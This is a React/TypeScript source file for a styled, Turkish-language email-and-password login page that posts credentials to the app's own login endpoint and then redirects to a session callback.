import React, { useState } from 'react';
import { Button, Form, Input } from 'antd';
import { LockOutlined, MailOutlined } from '@ant-design/icons';
import { apiClient } from '../../utils';
import { Redirect } from 'react-router';

export function LoginPasswordPage() {
  const [loading, setLoading] = useState(false);
  const [loginCompleted, setLoginCompleted] = useState(false);

  const onFinish = (values: any) => {
    setLoading(true);
    apiClient
      .post('login-password', values)
      .then(() => {})
      .catch(() => {})
      .finally(() => {
        setLoginCompleted(true);
        setLoading(false);
      });
  };

  const containerStyle: React.CSSProperties = {
    minHeight: '100vh',
    display: 'flex',
    alignItems: 'center',
    justifyContent: 'center',
    background: 'linear-gradient(135deg, #667eea 0%, #764ba2 100%)',
    padding: '20px',
  };

  const cardStyle: React.CSSProperties = {
    background: 'white',
    borderRadius: '16px',
    boxShadow: '0 20px 60px rgba(0, 0, 0, 0.3)',
    width: '100%',
    maxWidth: '420px',
    overflow: 'hidden',
  };

  const headerStyle: React.CSSProperties = {
    background: 'linear-gradient(135deg, #667eea 0%, #764ba2 100%)',
    padding: '40px 32px',
    textAlign: 'center',
  };

  const iconWrapperStyle: React.CSSProperties = {
    width: '80px',
    height: '80px',
    background: 'rgba(255, 255, 255, 0.2)',
    borderRadius: '50%',
    display: 'flex',
    alignItems: 'center',
    justifyContent: 'center',
    margin: '0 auto 20px',
    border: '3px solid rgba(255, 255, 255, 0.3)',
  };

  const iconStyle: React.CSSProperties = {
    fontSize: '40px',
    color: 'white',
  };

  const titleStyle: React.CSSProperties = {
    fontSize: '28px',
    fontWeight: 700,
    color: 'white',
    margin: '0 0 8px 0',
  };

  const subtitleStyle: React.CSSProperties = {
    fontSize: '14px',
    color: 'rgba(255, 255, 255, 0.9)',
    margin: 0,
  };

  const formContainerStyle: React.CSSProperties = {
    padding: '32px',
  };

  const inputStyle: React.CSSProperties = {
    height: '48px',
    borderRadius: '8px',
    fontSize: '15px',
  };

  const buttonStyle: React.CSSProperties = {
    width: '100%',
    height: '48px',
    borderRadius: '8px',
    fontSize: '16px',
    fontWeight: 600,
    background: 'linear-gradient(135deg, #667eea 0%, #764ba2 100%)',
    border: 'none',
  };

  const formItemStyle: React.CSSProperties = {
    marginBottom: '20px',
  };

  return (
    <>
      {!loginCompleted ? (
        <div style={containerStyle}>
          <div style={cardStyle}>
            <div style={headerStyle}>
              <div style={iconWrapperStyle}>
                <LockOutlined style={iconStyle} />
              </div>
              <h1 style={titleStyle}>Güvenli Giriş</h1>
              <p style={subtitleStyle}>Hesabınıza erişmek için giriş yapın</p>
            </div>
            
            <div style={formContainerStyle}>
              <Form layout="vertical" name="basic" onFinish={onFinish}>
                <Form.Item 
                  label={<span style={{ fontSize: '14px', fontWeight: 500, color: '#374151' }}>E-posta</span>}
                  name="username" 
                  rules={[{ required: true, message: 'Zorunlu alan' }]}
                  style={formItemStyle}
                >
                  <Input 
                    type="email" 
                    prefix={<MailOutlined style={{ color: '#9ca3af' }} />}
                    placeholder="ornek@email.com"
                    style={inputStyle}
                  />
                </Form.Item>
                
                <Form.Item 
                  label={<span style={{ fontSize: '14px', fontWeight: 500, color: '#374151' }}>Şifre</span>}
                  name="password" 
                  rules={[{ required: true, message: 'Zorunlu alan' }]}
                  style={formItemStyle}
                >
                  <Input.Password 
                    prefix={<LockOutlined style={{ color: '#9ca3af' }} />}
                    placeholder="Şifrenizi girin"
                    style={inputStyle}
                  />
                </Form.Item>
                
                <Form.Item style={{ marginTop: '28px', marginBottom: 0 }}>
                  <Button 
                    type="primary" 
                    htmlType="submit" 
                    loading={loading}
                    style={buttonStyle}
                  >
                    Giriş Yap
                  </Button>
                </Form.Item>
              </Form>
            </div>
          </div>
        </div>
      ) : (
        <Redirect to={{ pathname: '/session', search: '?logincallback=1' }} />
      )}
    </>
  );
}
